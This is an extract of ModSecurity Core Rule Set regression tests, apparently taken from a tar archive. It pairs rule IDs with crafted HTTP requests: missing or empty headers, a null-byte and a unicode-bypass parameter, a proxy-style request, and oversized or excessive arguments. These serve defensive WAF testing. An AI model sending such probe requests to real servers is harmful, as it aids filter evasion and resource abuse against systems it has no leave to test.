/?param=foo%uFF01 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Proxy access attempt (960014) ##################################################### %output 960014 %request GET http://www.some_remote_site.com/ HTTP/1.0 Host: www.some_remote_site.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Invalid character in request (960901) ##################################################### %output 960901 %event 960901 %request GET /?param=foo%00 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ����������������������������������������������modsecurity_crs_21_protocol_anomalies.tests���������������������������������������������������������0000664�0000000�0000000�00000007446�12164572564�0036674�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 21 - protocol anomalies %test Request Missing a Host Header (960008) ##################################################### %output 960008 %request GET / HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Empty Host Header (960007) ##################################################### %output 960007 %request GET / HTTP/1.0 Host: User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Missing an Accept Header (960015) ##################################################### %output 960015 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Has an Empty Accept Header (960021) ##################################################### %output 960021 %request GET / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Missing a User Agent Header (960009) ##################################################### %output 960009 %request GET / HTTP/1.0 Host: $hostname Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Has an Empty User Agent Header (960006) ##################################################### %output 960006 %request GET / HTTP/1.0 Host: $hostname User-Agent: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Request Containing Content, but Missing Content-Type header (960904) ##################################################### %output 960904 %request POST / HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Length: 5 foo=1 %test Host header is a numeric IP address (960017) ##################################################### %output 960017 %request GET / HTTP/1.0 Host: 192.168.1.100 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %endtest ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity_crs_23_request_limits.tests�������������������������������������������������������������0000664�0000000�0000000�00000211567�12164572564�0036057�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000�SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/regression-tests/tests���������������������������������������������������������������������������������������������������%timeout 10 # FILE 23 - Request Limits %test Argument name too long (960209) ##################################################### %output 960209 %request GET /?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Argument value too long (960208) ##################################################### %output 960208 %request GET /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Too many arguments in request (960335) ##################################################### %output 960335 %request GET /?param1=1¶m2=1¶m3=1¶m4=1¶m5=1¶m6=1¶m7=1¶m8=1¶m9=1¶m10=1¶m11=1¶m12=1¶m13=1¶m14=1¶m15=1¶m16=1¶m17=1¶m18=1¶m19=1¶m20=1¶m21=1¶m22=1¶m23=1¶m24=1¶m25=1¶m26=1¶m27=1¶m28=1¶m29=1¶m30=1¶m31=1¶m32=1¶m33=1¶m34=1¶m35=1¶m36=1¶m37=1¶m38=1¶m39=1¶m40=1¶m41=1¶m42=1¶m43=1¶m44=1¶m45=1¶m46=1¶m47=1¶m48=1¶m49=1¶m50=1¶m51=1¶m52=1¶m53=1¶m54=1¶m55=1¶m56=1¶m57=1¶m58=1¶m59=1¶m60=1¶m61=1¶m62=1¶m63=1¶m64=1¶m65=1¶m66=1¶m67=1¶m68=1¶m69=1¶m70=1¶m71=1¶m72=1¶m73=1¶m74=1¶m75=1¶m76=1¶m77=1¶m78=1¶m79=1¶m80=1¶m81=1¶m82=1¶m83=1¶m84=1¶m85=1¶m86=1¶m87=1¶m88=1¶m89=1¶m90=1¶m91=1¶m92=1¶m93=1¶m94=1¶m95=1¶m96=1¶m97=1¶m98=1¶m99=1¶m100=1¶m101=1¶m102=1¶m103=1¶m104=1¶m105=1¶m106=1¶m107=1¶m108=1¶m109=1¶m110=1¶m111=1¶m112=1¶m113=1¶m114=1¶m115=1¶m116=1¶m117=1¶m118=1¶m119=1¶m120=1¶m121=1¶m122=1¶m123=1¶m124=1¶m125=1¶m126=1¶m127=1¶m128=1¶m129=1¶m130=1¶m131=1¶m132=1¶m133=1¶m134=1¶m135=1¶m136=1¶m137=1¶m138=1¶m139=1¶m140=1¶m141=1¶m142=1¶m143=1¶m144=1¶m145=1¶m146=1¶m147=1¶m148=1¶m149=1¶m150=1¶m151=1¶m152=1¶m153=1¶m154=1¶m155=1¶m156=1¶m157=1¶m158=1¶m159=1¶m160=1¶m161=1¶m162=1¶m163=1¶m164=1¶m165=1¶m166=1¶m167=1¶m168=1¶m169=1¶m170=1¶m171=1¶m172=1¶m173=1¶m174=1¶m175=1¶m176=1¶m177=1¶m178=1¶m179=1¶m180=1¶m181=1¶m182=1¶m183=1¶m184=1¶m185=1¶m186=1¶m187=1¶m188=1¶m189=1¶m190=1¶m191=1¶m192=1¶m193=1¶m194=1¶m195=1¶m196=1¶m197=1¶m198=1¶m199=1¶m200=1¶m201=1¶m202=1¶m203=1¶m204=1¶m205=1¶m206=1¶m207=1¶m208=1¶m209=1¶m210=1¶m211=1¶m212=1¶m213=1¶m214=1¶m215=1¶m216=1¶m217=1¶m218=1¶m219=1¶m220=1¶m221=1¶m222=1¶m223=1¶m224=1¶m225=1¶m226=1¶m227=1¶m228=1¶m229=1¶m230=1¶m231=1¶m232=1¶m233=1¶m234=1¶m235=1¶m236=1¶m237=1¶m238=1¶m239=1¶m240=1¶m241=1¶m242=1¶m243=1¶m244=1¶m245=1¶m246=1¶m247=1¶m248=1¶m249=1¶m250=1¶m251=1¶m252=1¶m253=1¶m254=1¶m255=1¶m256=1 HTTP/1.0 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive %test Total arguments size exceeded (960341) ##################################################### #%output 960341 %status 413 %request POST / HTTP/1.1 Host: $hostname User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 64005 foo=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111